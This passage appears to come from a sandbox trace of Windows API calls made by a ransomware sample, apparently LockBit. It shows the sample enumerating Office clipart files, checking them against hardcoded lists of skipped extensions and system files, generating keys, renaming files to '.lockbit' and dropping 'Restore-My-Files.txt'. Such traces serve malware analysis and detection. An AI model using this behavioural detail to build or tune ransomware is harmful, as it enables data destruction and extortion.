IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.196] free (_Block=0x1fa2ed8) [0152.196] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0213449.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.196] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.196] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.196] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6607e0d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7cb6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0214934.WMF", cAlternateFileName="")) returned 1 [0152.196] lstrcmpiW (lpString1=".", lpString2="J0214934.WMF") returned -1 [0152.196] lstrcmpiW (lpString1="..", lpString2="J0214934.WMF") returned -1 [0152.197] PathFindExtensionW (pszPath="J0214934.WMF") returned=".WMF" [0152.197] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.197] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.198] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.198] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0214934.WMF") returned 1 [0152.198] lstrcmpiW (lpString1="ntldr", lpString2="J0214934.WMF") returned 1 [0152.198] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0214934.WMF") returned 1 [0152.199] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0214934.WMF") returned -1 [0152.199] lstrcmpiW (lpString1="autorun.inf", lpString2="J0214934.WMF") returned -1 [0152.199] lstrcmpiW (lpString1="thumbs.db", lpString2="J0214934.WMF") returned 1 [0152.199] lstrcmpiW (lpString1="iconcache.db", lpString2="J0214934.WMF") returned -1 [0152.199] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.199] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214934.WMF") returned=".WMF" [0152.199] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.199] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.199] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.199] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.199] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.199] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.199] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.199] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.199] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.199] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.199] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.199] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.199] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.199] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.200] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.200] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.200] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.200] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.200] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.200] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.200] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.200] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.200] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.200] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.200] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.200] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.200] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.200] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.200] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214934.WMF.lockbit") returned 72 [0152.200] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214934.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0214934.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0152.201] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.201] malloc (_Size=0x40068) returned 0x3d70450 [0152.201] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=31926) returned 1 [0152.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.202] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0152.202] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.202] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0152.202] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0152.206] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214934.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214934.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.206] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.206] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.208] free (_Block=0x1fa2ed8) [0152.208] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214934.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.208] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.208] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.208] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565a9290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xaefa, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0214948.WMF", cAlternateFileName="")) returned 1 [0152.208] lstrcmpiW (lpString1=".", lpString2="J0214948.WMF") returned -1 [0152.208] lstrcmpiW (lpString1="..", lpString2="J0214948.WMF") returned -1 [0152.208] PathFindExtensionW (pszPath="J0214948.WMF") returned=".WMF" [0152.208] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.208] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.208] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.208] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.208] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.208] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.208] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.208] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.208] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.208] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.209] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.209] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.210] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0214948.WMF") returned 1 [0152.210] lstrcmpiW (lpString1="ntldr", lpString2="J0214948.WMF") returned 1 [0152.210] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0214948.WMF") returned 1 [0152.210] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0214948.WMF") returned -1 [0152.210] lstrcmpiW (lpString1="autorun.inf", lpString2="J0214948.WMF") returned -1 [0152.210] lstrcmpiW (lpString1="thumbs.db", lpString2="J0214948.WMF") returned 1 [0152.211] lstrcmpiW (lpString1="iconcache.db", lpString2="J0214948.WMF") returned -1 [0152.211] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.211] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214948.WMF") returned=".WMF" [0152.211] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.211] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.211] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.212] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.212] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.212] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.212] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.212] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.212] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.212] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.212] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.212] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.212] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214948.WMF.lockbit") returned 72 [0152.212] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214948.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0214948.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0152.216] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.216] malloc (_Size=0x40068) returned 0x3e70008 [0152.216] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=44794) returned 1 [0152.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0152.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0152.218] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0152.224] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214948.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214948.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.224] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.224] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.225] free (_Block=0x1fa2ed8) [0152.225] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0214948.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.225] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.225] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.225] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26227e00, ftCreationTime.dwHighDateTime=0x1be5489, ftLastAccessTime.dwLowDateTime=0x565a9290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x26227e00, ftLastWriteTime.dwHighDateTime=0x1be5489, nFileSizeHigh=0x0, nFileSizeLow=0x2d6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0215070.WMF", cAlternateFileName="")) returned 1 [0152.225] lstrcmpiW (lpString1=".", lpString2="J0215070.WMF") returned -1 [0152.225] lstrcmpiW (lpString1="..", lpString2="J0215070.WMF") returned -1 [0152.225] PathFindExtensionW (pszPath="J0215070.WMF") returned=".WMF" [0152.225] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.225] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.225] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.225] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.225] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.225] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.225] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.226] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.226] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0215070.WMF") returned 1 [0152.227] lstrcmpiW (lpString1="ntldr", lpString2="J0215070.WMF") returned 1 [0152.227] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0215070.WMF") returned 1 [0152.227] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0215070.WMF") returned -1 [0152.227] lstrcmpiW (lpString1="autorun.inf", lpString2="J0215070.WMF") returned -1 [0152.227] lstrcmpiW (lpString1="thumbs.db", lpString2="J0215070.WMF") returned 1 [0152.227] lstrcmpiW (lpString1="iconcache.db", lpString2="J0215070.WMF") returned -1 [0152.227] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.227] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0215070.WMF") returned=".WMF" [0152.227] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.227] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.227] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.228] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") 